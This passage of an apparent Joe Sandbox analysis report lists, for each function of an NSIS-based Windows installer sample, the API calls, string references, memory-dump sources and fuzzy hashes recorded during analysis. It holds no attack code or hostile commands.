                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                • MulDiv.KERNEL32(00018A00,00000064,0033BF63), ref: 00403295
                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: *?|<>/":
                                                                                                • API String ID: 589700163-165019052
                                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                • GlobalFree.KERNEL32(006B0240), ref: 00402387
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3376005127-0
                                                                                                • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 2568930968-0
                                                                                                • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                • wsprintfW.USER32 ref: 00404483
                                                                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                • API String ID: 1697273262-1764544995
                                                                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                • API String ID: 2577523808-3778932970
                                                                                                • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcatwsprintf
                                                                                                • String ID: %02x%c$...
                                                                                                • API String ID: 3065427908-1057055748
                                                                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                • API String ID: 2266616436-4211696005
                                                                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
